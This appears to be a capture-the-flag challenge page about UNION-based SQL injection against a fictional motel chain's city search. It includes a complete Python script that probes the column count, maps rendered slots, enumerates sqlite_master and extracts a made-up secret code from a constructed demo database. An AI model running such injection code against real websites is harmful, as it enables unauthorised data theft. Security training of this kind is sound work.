OffByOne
RoadTwelve Inn's city search has been running on the same code path since 1998. The corporate office uses the same database to track things guests shouldn't see.
The Scenario
RoadTwelve Inn's reservation site went online in 1998 and the search endpoint has barely changed since. The original storage choice was reasonable for a property catalog of three hundred rooms; nobody revisited it when the chain grew past two hundred properties. Operations needed somewhere to log the master comp codes for the corporate office and put them next to everything else, because that was the database the ops portal already knew how to reach.
Challenge Intel
Synopsis
RoadTwelve's city search renders seven columns. Find the column count, UNION across to the internal promo codes table, and read the master comp code.
What It Is
RoadTwelve Inn is a budget motel chain whose website lets customers search for a property by city. The search SELECT returns seven columns, which the results page renders as property cards. The internal_promos table, which holds the corporate master comp codes, sits in the same SQLite file, so a UNION appended to the search query can reach it. This is the canonical column-count-discovery plus UNION extraction exercise: break out of the quoted city parameter, walk ORDER BY n upward until SQLite rejects the term (the last accepted n is the column count), confirm the table name through sqlite_master, then place the extracted value in a column slot the page actually renders, padding the remaining slots with NULL.
Who It's For
Players who already understand UNION SQLi conceptually but want practice on the column-count probe step in a realistic property search.
Skills You'll Practice
- Quote-breaking SQLi via URL parameters
- Discovering column count via ORDER BY probing
- Mapping UNION columns to visible render slots
- sqlite_master enumeration
- Cross-table UNION extraction
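The full chain the skills above describe, as an added worked example that is not part of the challenge or its code: a constructed in-memory SQLite database stands in for RoadTwelve's file, the seven-column properties schema and the internal_promos column names (label, code) are assumptions because the page does not give them, and the demo comp code is made up. The search function reproduces the 1998-style string splicing; the rest is the attacker's side, driven only through that search.

```python
import sqlite3


def build_demo_db():
    """Constructed stand-in for RoadTwelve's SQLite file (schema is assumed, not from the page)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE properties (
            id INTEGER PRIMARY KEY, name TEXT, city TEXT, address TEXT,
            phone TEXT, rate REAL, image TEXT);
        INSERT INTO properties VALUES
            (1, 'RoadTwelve Inn Tulsa', 'Tulsa', '12 Route Rd', '555-0100', 59.0, 'tulsa.jpg'),
            (2, 'RoadTwelve Inn Amarillo', 'Amarillo', '40 Frontage Rd', '555-0101', 54.0, 'ama.jpg');
        CREATE TABLE internal_promos (id INTEGER PRIMARY KEY, label TEXT, code TEXT);
        INSERT INTO internal_promos VALUES (1, 'master comp', 'COMP-DEMO-0000');
    """)
    return con


def vulnerable_search(con, city):
    """The 1998 code path: the city parameter is spliced straight into the SQL text."""
    sql = ("SELECT id, name, city, address, phone, rate, image "
           f"FROM properties WHERE city = '{city}'")
    return con.execute(sql).fetchall()


def render_cards(rows):
    """The results page shows only three of the seven columns per property card."""
    return [{"name": r[1], "city": r[2], "rate": r[5]} for r in rows]


def probe_column_count(con, max_cols=20):
    """Raise ORDER BY n until SQLite rejects the term; the last accepted n is the column count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_search(con, f"x' ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_payload(ncols, slot, expr, table, where=""):
    """Build a UNION that puts expr in the chosen slot and pads every other slot with NULL."""
    cols = ["NULL"] * ncols
    cols[slot] = expr
    suffix = f" WHERE {where}" if where else ""
    return f"x' UNION SELECT {', '.join(cols)} FROM {table}{suffix}--"


def find_visible_slots(con, ncols):
    """Inject a distinct marker per slot and record which markers survive rendering."""
    markers = ", ".join(f"'m{i}'" for i in range(ncols))
    cards = render_cards(vulnerable_search(con, f"x' UNION SELECT {markers}--"))
    slots = {}
    for card in cards:
        for key, val in card.items():
            if isinstance(val, str) and val.startswith("m") and val[1:].isdigit():
                slots[int(val[1:])] = key
    return slots  # maps rendered slot index -> card field, e.g. {1: 'name', 2: 'city', 5: 'rate'}


def union_extract(con, ncols, slots, expr, table, where=""):
    """Read expr from table through the first visible slot, using only the rendered page."""
    slot = min(slots)
    payload = union_payload(ncols, slot, expr, table, where)
    return [card[slots[slot]] for card in render_cards(vulnerable_search(con, payload))]


def list_tables(con, ncols, slots):
    """sqlite_master enumeration: table names come back through the visible slot."""
    return union_extract(con, ncols, slots, "name", "sqlite_master", "type='table'")


def read_master_comp(con):
    """End to end: count columns, map visible slots, confirm the table, pull the code."""
    ncols = probe_column_count(con)
    slots = find_visible_slots(con, ncols)
    if "internal_promos" not in list_tables(con, ncols, slots):
        return None
    # 'code' is an assumed column name; the page only names the table.
    return union_extract(con, ncols, slots, "code", "internal_promos")[0]


if __name__ == "__main__":
    db = build_demo_db()
    print("columns:", probe_column_count(db))
    print("visible slots:", find_visible_slots(db, 7))
    print("master comp code:", read_master_comp(db))
```

Two details matter when moving this to the real endpoint: the trailing `--` is what neutralizes the closing quote the application appends, so every payload needs it, and the marker step is not optional, since the seventh column existing in the SELECT does not mean the page prints it. A prepared statement (`WHERE city = ?`) removes the whole class of problem regardless of what else lives in the file.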
What You'll Gain
- Reflex for ORDER BY probing as column-count discovery
- Pattern recognition for property/listing search → UNION extraction